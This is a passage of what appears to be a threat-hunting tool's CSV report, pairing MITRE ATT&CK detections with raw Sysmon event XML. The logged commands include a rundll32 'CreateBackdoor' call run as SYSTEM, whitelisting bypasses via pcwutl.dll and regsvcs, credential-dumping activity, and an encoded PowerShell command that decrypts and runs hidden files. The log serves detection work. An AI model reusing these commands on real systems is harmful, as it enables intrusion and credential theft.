<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.234543Z"">
</TimeCreated>
<EventRecordID>243544</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.077</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010476F2000</Data>
<Data Name=""ProcessId"">7836</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T17:09:02.275164Z"">
</TimeCreated>
<EventRecordID>16507</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2012"" ThreadID=""300"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 17:09:02.275</Data>
<Data Name=""ProcessGuid"">365ABB72-532E-5CD8-0000-00106C222700</Data>
<Data Name=""ProcessId"">1528</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
<Data Name=""LogonId"">0x135f2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-516B-5CD8-0000-001087E41600</Data>
<Data Name=""ParentProcessId"">3788</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.234543Z"">
</TimeCreated>
<EventRecordID>243544</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.077</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010476F2000</Data>
<Data Name=""ProcessId"">7836</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T17:09:02.275164Z"">
</TimeCreated>
<EventRecordID>16507</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2012"" ThreadID=""300"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 17:09:02.275</Data>
<Data Name=""ProcessGuid"">365ABB72-532E-5CD8-0000-00106C222700</Data>
<Data Name=""ProcessId"">1528</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
<Data Name=""LogonId"">0x135f2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-516B-5CD8-0000-001087E41600</Data>
<Data Name=""ParentProcessId"">3788</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436010.074656,2019-07-30T01:33:30.074656+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:29.646278Z"">
</TimeCreated>
<EventRecordID>4920</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:28.893</Data>
<Data Name=""ProcessGuid"">747F3D96-6628-5D3F-0000-0010349B8800</Data>
<Data Name=""ProcessId"">6552</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:58:13.389836Z"">
</TimeCreated>
<EventRecordID>19</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""164"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 16:58:13.309</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
<Data Name=""FileVersion"">6.1.7601.23677 (win7sp1_ldr.170209-0600)</Data>
<Data Name=""Description"">SAM Library DLL</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:58:13.389836Z"">
</TimeCreated>
<EventRecordID>19</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""164"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 16:58:13.309</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
<Data Name=""FileVersion"">6.1.7601.23677 (win7sp1_ldr.170209-0600)</Data>
<Data Name=""Description"">SAM Library DLL</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556380673.931363,2019-04-27T19:57:53.931363+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /A ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-27T15:57:53.931363Z"">
</TimeCreated>
<EventRecordID>6594</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1912"" ThreadID=""996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1059,technique_name=Command-Line Interface</Data>
<Data Name=""UtcTime"">2019-04-27 15:57:53.806</Data>
<Data Name=""ProcessGuid"">365ABB72-7C01-5CC4-0000-00105C5C0C00</Data>
<Data Name=""ProcessId"">3076</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /A</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-7AB1-5CC4-0000-0020BEF40000</Data>
<Data Name=""LogonId"">0xf4be</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-7C01-5CC4-0000-0010F9530C00</Data>
<Data Name=""ParentProcessId"">2992</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\AppData\Roaming\NvSmart.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\AppData\Roaming\NvSmart.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.43237,2019-05-27T05:29:18.432370+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.432370Z"">
</TimeCreated>
<EventRecordID>5925</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.392</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00100C96FF00</Data>
<Data Name=""ProcessId"">3136</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558633564.671625,2019-05-23T21:46:04.671625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-23T17:45:34.538296Z"">
</TimeCreated>
<EventRecordID>1025</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-23 17:45:34.528</Data>
<Data Name=""ProcessGuid"">365ABB72-DC3E-5CE6-0000-00102BC97200</Data>
<Data Name=""ProcessId"">712</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
